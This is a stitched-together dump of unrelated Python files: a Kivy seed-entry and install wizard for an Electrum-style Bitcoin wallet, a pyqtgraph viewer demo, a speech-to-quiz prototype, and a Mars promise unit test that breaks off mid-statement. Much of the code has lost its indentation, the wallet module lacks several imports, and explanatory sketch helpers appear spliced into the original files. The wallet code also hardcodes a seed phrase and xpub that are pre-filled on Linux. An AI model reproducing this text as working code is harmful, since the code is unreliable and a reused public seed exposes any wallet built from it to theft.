from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum.base_wizard import BaseWizard
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: 0, 0, 0, .9
Rectangle:
size: Window.size
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM XRJV1'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum.mnemonic import Mnemonic
from electrum.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.is_valid = kwargs['is_valid']
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, **kwargs):
self.dispatch('on_wizard_complete', self.wallet)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def password_dialog(self, message, callback):
popup = PasswordDialog()
popup.init(message, callback)
popup.open()
def request_password(self, run_next, force_disable_encrypt_cb=False):
def callback(pin):
if pin:
self.run('confirm_password', pin, run_next)
else:
run_next(None, None)
self.password_dialog('Choose a PIN code', callback)
def confirm_password(self, pin, run_next):
def callback(conf):
if conf == pin:
run_next(pin, False)
else:
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
self.password_dialog('Confirm your PIN code', callback)
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
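# ---------------------------------------------------------------------------
# Hedged sketch, not part of the original module: waiting_dialog() above runs
# a blocking task in a worker thread and hands the "done" update back to the
# UI thread through Kivy's Clock. The framework-free helper below illustrates
# the same hand-off with a plain queue standing in for the UI event loop; the
# name _run_blocking_task and the callback signature are assumptions made for
# this illustration only.
def _run_blocking_task(task, on_done):
    """Run `task` in a thread and deliver (result, error) to `on_done`."""
    import queue
    import threading
    results = queue.Queue()
    def worker():
        try:
            results.put((task(), None))
        except Exception as err:           # report errors instead of losing them
            results.put((None, err))
    threading.Thread(target=worker, daemon=True).start()
    value, error = results.get()           # a real UI loop would poll instead
    on_done(value, error)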
|
test_viewer.py
|
#!/usr/bin/env python3
"""
Quick and simple script to see if the viewer is functional.
FIXME(ycho): Not an actual test, more like an example.
"""
import time
import numpy as np
import functools
from abc import abstractmethod, ABC
import multiprocessing as mp
from tqdm import tqdm
import threading
import logging
from typing import Tuple, Dict, List, Callable, Any
import pyqtgraph as pg
import pyqtgraph.opengl as gl
from pyqtgraph.Qt import QtGui, QtCore
from phonebot.core.common.queue_listener import QueueListener
from phonebot.vis.viewer.viewer_base import ViewerState
from phonebot.vis.viewer.viewer_base import HandleHelper
from phonebot.vis.viewer._pyqtgraph import PyqtViewer3D
from phonebot.vis.viewer._pyqtgraph.pyqtgraph_handlers import LineStripHandler
from phonebot.vis.viewer.async_viewer import AsyncViewer
class KeyCameraHandler:
def __init__(self, viewer: PyqtViewer3D):
self.viewer = viewer
def __call__(self, dy, dz):
self.viewer.widget_.orbit(dz, dy)
def main():
logging.basicConfig(level=logging.INFO)
use_async = True
if use_async:
viewer = AsyncViewer(PyqtViewer3D)
else:
viewer = PyqtViewer3D()
handler = HandleHelper(viewer)
viewer.register('camera', KeyCameraHandler)
viewer.register('line_strip', LineStripHandler)
def on_mouse(data):
print('on_mouse --------- data = {}'.format(data))
def on_key(data):
c = data[0]
if c in [ord(x) for x in 'WASD']:
c = chr(c).lower()
dz, dy = 0, 0
if c == 'w':
dy = +5
if c == 's':
dy = -5
if c == 'a':
dz = -5
if c == 'd':
dz = +5
handler.camera(dy=dy, dz=dz)
if c == ord('Q'):
viewer.stop()
viewer.on_mouse(on_mouse)
viewer.on_key(on_key)
def draw_stuff():
for _ in tqdm(range(1024)):
if viewer.state() == ViewerState.CLOSED:
break
md = gl.MeshData.sphere(rows=4, cols=8)
md.setVertexColors(md.vertexes())
with handler.collect():
handler.line(pos=np.random.uniform(size=(1, 2, 3)))
handler.point(pos=np.random.uniform(size=(32, 3)))
handler.mesh(meshdata=md)
handler.line_strip(pos=np.random.uniform(size=(32, 3)))
time.sleep(0.01)
try:
viewer.start()
except KeyboardInterrupt:
viewer.stop()
t = threading.Thread(target=draw_stuff)
t.start()
try:
t.join()
finally:
viewer.stop()
if __name__ == '__main__':
main()
|
prototype.py
|
import nltk
from nltk.tokenize import RegexpTokenizer
import speech_recognition as SpeechRecog
import pyaudio
from random_word import RandomWords
import random
import time
import threading
init_rec = SpeechRecog.Recognizer()
score = 0
num_ques = 0
def word_filter(string):
# removes punctuation
tokenizer = RegexpTokenizer(r'\w+')
    # split the string into a list of tokens
string_list_with_char = tokenizer.tokenize(string)
# remove single letter
string_list = [w for w in string_list_with_char if len(w) > 1]
def is_noun(pos): return pos[:2] == 'NN'
# take only nouns
nouns = [word for (word, pos) in nltk.pos_tag(string_list) if is_noun(pos)]
    # remove duplicates
string_filtered = []
for i in nouns:
if (nouns.count(i) > 1 and (i not in string_filtered) or nouns.count(i) == 1):
string_filtered.append(i)
return string_filtered
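# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the original script: rough expected
# behaviour of word_filter() above. Running it needs the NLTK
# 'averaged_perceptron_tagger' data package, and the sample sentence plus the
# _demo_word_filter name are assumptions used only for this demonstration.
def _demo_word_filter():
    # nltk.download('averaged_perceptron_tagger')   # one-time setup, if missing
    sample = "The professor explained the photosynthesis process to the class."
    nouns = word_filter(sample)
    # Expected to keep unique nouns such as 'professor', 'photosynthesis',
    # 'process' and 'class' (exact output depends on the tagger), while the
    # tokenizer drops punctuation and single-letter tokens.
    print(nouns)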
def quiz(string):
global score
global num_ques
ran_word = random_words()
minimize = [words for words in string if len(words) > 5]
    # pick a random word from the lecture transcript as the correct answer
random_correct = random.choice(minimize)
# print(random_correct)
    # combine the wrong options with the correct answer
options = []
for i in ran_word:
options.append(i)
options.append(random_correct)
# shuffling all the options
random.shuffle(options)
# print(options)
op1 = options[0]
op2 = options[1]
op3 = options[2]
op4 = options[3]
print("Choose the word which was mentioned by the professor:")
print("1.", options[0], "2.", options[1], "3.", options[2], "4.", options[3])
user_choice = input("Enter option:")
if user_choice == "1":
ans = op1
elif user_choice == "2":
ans = op2
elif user_choice == "3":
ans = op3
elif user_choice == "4":
ans = op4
    else:
        print("Invalid option")
        ans = None  # treat an invalid choice as a wrong answer
if ans == random_correct:
print("Correct option")
score += 1
num_ques += 1
else:
print("Wrong option")
num_ques += 1
def random_words():
r = RandomWords()
words = r.get_random_words()
words1 = words[:3]
return words1
def main():
while True:
words = []
for i in range(1):
with SpeechRecog.Microphone() as source:
audio_data = init_rec.record(source, duration=10)
try:
text = init_rec.recognize_google(audio_data)
except:
text = ''
text_filtered = word_filter(text)
for j in text_filtered:
words.append(j)
thread_quiz = threading.Thread(target=quiz, args=(words, ))
thread_quiz.start()
thread_quiz.join(timeout=10)
print(score)
if __name__ == '__main__':
main()
|
test_promise.py
|
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import sys
import threading
import time
import unittest
import weakref
from queue import Queue
from mars.tests.core import create_actor_pool
from mars.utils import build_exc_info
from mars import promise
class ServeActor(promise.PromiseActor):
def __init__(self):
super().__init__()
self._result_list = []
@promise.reject_on_exception
def serve(self, value, delay=None, accept=True, raises=False, callback=None):
self.ctx.sleep(delay if delay is not None else 0.1)
if raises:
raise ValueError('User-induced error')
self._result_list.append(value)
if callback:
self.tell_promise(callback, value, _accept=accept)
def get_result(self):
return self._result_list
def clear_result(self):
self._result_list = []
class PromiseTestActor(promise.PromiseActor):
def __init__(self):
super().__init__()
self._finished = False
def get_finished(self):
return self._finished
def reset_finished(self):
self._finished = False
def test_normal(self):
self._finished = False
assert self.promise_ref().uid == self.uid
ref = self.promise_ref('ServeActor')
assert ref.__getattr__('_caller') is self
p = ref.serve(0, _promise=True)
ref = self.promise_ref(self.ctx.actor_ref('ServeActor'))
for _ in range(10):
p = p.then(lambda v: ref.serve(v + 1, _promise=True))
p.then(lambda *_: setattr(self, '_finished', True))
def test_error_raise(self):
self._finished = False
ref = self.promise_ref('ServeActor')
ref.serve(0, raises=True, _promise=True) \
.then(lambda v: ref.serve(v + 1, _promise=True)) \
.catch(lambda *_: ref.serve(-1, _promise=True)) \
.then(lambda *_: setattr(self, '_finished', True))
def test_spawn(self, raises=False):
def _task():
self.ctx.sleep(0.5)
if raises:
raise SystemError
ref = self.promise_ref('ServeActor')
promise.all_([self.spawn_promised(_task) for _ in range(4)]) \
.then(lambda *_: ref.serve(0, delay=0, _promise=True)) \
.catch(lambda *exc: ref.serve(exc[0].__name__, delay=0, _promise=True)) \
.then(lambda *_: setattr(self, '_finished', True))
def test_all_promise(self):
self._finished = False
ref = self.promise_ref('ServeActor')
promises = []
def subsequent_all(*_):
def func(idx, *_, **kw):
return ref.serve(idx, _promise=True, **kw)
for idx in range(10):
promises.append(func(idx * 2).then(functools.partial(func, idx * 2 + 1)))
return promise.all_(promises)
ref.serve(-128, _promise=True) \
.then(subsequent_all) \
.then(lambda *_: ref.serve(127, _promise=True)) \
.then(lambda *_: setattr(self, '_finished', True))
def test_timeout(self):
self._finished = False
ref = self.promise_ref('ServeActor')
def _rejecter(*exc):
ref.serve(exc[0].__name__)
ref.serve(0, delay=2, _timeout=1, _promise=True) \
.catch(_rejecter) \
.then(lambda *_: setattr(self, '_finished', True))
def test_no_timeout(self):
self._finished = False
ref = self.promise_ref('ServeActor')
def _rejecter(*exc):
ref.serve(exc[0].__name__)
ref.serve(0, delay=1, _timeout=2, _promise=True) \
.catch(_rejecter) \
.then(lambda *_: setattr(self, '_finished', True))
def test_ref_reject(self):
from mars.errors import WorkerProcessStopped
self._finished = False
ref = self.promise_ref('ServeActor')
def _rejecter(*exc):
ref.serve(exc[0].__name__)
ref.serve(0, delay=2, _promise=True) \
.catch(_rejecter) \
.then(lambda *_: setattr(self, '_finished', True))
self.reject_promise_refs([ref], *build_exc_info(WorkerProcessStopped))
def test_addr_reject(self):
from mars.errors import WorkerDead
self._finished = False
ref = self.promise_ref('ServeActor', address=self.address)
def _rejecter(*exc):
ref.serve(exc[0].__name__)
ref.serve(0, delay=2, _promise=True) \
.catch(_rejecter) \
.then(lambda *_: setattr(self, '_finished', True))
self.reject_dead_endpoints([self.address], *build_exc_info(WorkerDead))
def test_closure_refcount(self, content=''):
ref = self.promise_ref('ServeActor', address=self.address)
class Intermediate(object):
def __init__(self, s):
self.str = s
new_content = Intermediate(f'Content: {content}')
def _acceptor(*_):
ref.serve(weakref.ref(new_content))
return f'Processed: {new_content.str}'
ref.serve(0, delay=0.5, _promise=True) \
.then(_acceptor) \
.then(lambda *_: setattr(self, '_finished', True))
def _raise_exception(exc):
raise exc
def wait_test_actor_result(ref, timeout):
import gevent
t = time.time()
while not ref.get_finished():
gevent.sleep(0.01)
if time.time() > t + timeout:
raise TimeoutError
@unittest.skipIf(sys.platform == 'win32', 'does not run in windows')
class Test(unittest.TestCase):
def testPromise(self):
promises = weakref.WeakValueDictionary()
req_queue = Queue()
value_list = []
time_unit = 0.1
def test_thread_body():
while True:
idx, v, success = req_queue.get()
if v is None:
break
value_list.append(('thread_body', v))
time.sleep(time_unit)
promises[idx].step_next([(v,), dict(_accept=success)])
try:
thread = threading.Thread(target=test_thread_body)
thread.daemon = True
thread.start()
def gen_promise(value, accept=True):
value_list.append(('gen_promise', value))
p = promise.Promise()
promises[p.id] = p
req_queue.put((p.id, value + 1, accept))
return p
# simple promise call
value_list = []
p = gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v))
p.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3)]
)
# continue accepted call with then
value_list = []
p.then(lambda *_: gen_promise(0)) \
.then(lambda v: gen_promise(v)) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2)]
)
# immediate error
value_list = []
p = promise.finished() \
.then(lambda *_: 5 / 0)
p.catch(lambda *_: gen_promise(0)) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1)]
)
# chained errors
value_list = []
p = promise.finished(_accept=False) \
.catch(lambda *_: 1 / 0) \
.catch(lambda *_: 2 / 0) \
.catch(lambda *_: gen_promise(0)) \
.catch(lambda *_: gen_promise(1))
p.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1)]
)
# continue error call
value_list = []
p = gen_promise(0) \
.then(lambda *_: 5 / 0) \
.then(lambda *_: gen_promise(2))
time.sleep(0.5)
value_list = []
p.catch(lambda *_: gen_promise(0)) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v).then(lambda x: x + 1)) \
.then(lambda v: gen_promise(v)) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 3), ('thread_body', 4)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('catch', 3)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v, False).then(lambda x: x + 1)) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('catch', 2)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.then(lambda v: v + 1) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 3), ('thread_body', 4),
('catch', 4)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
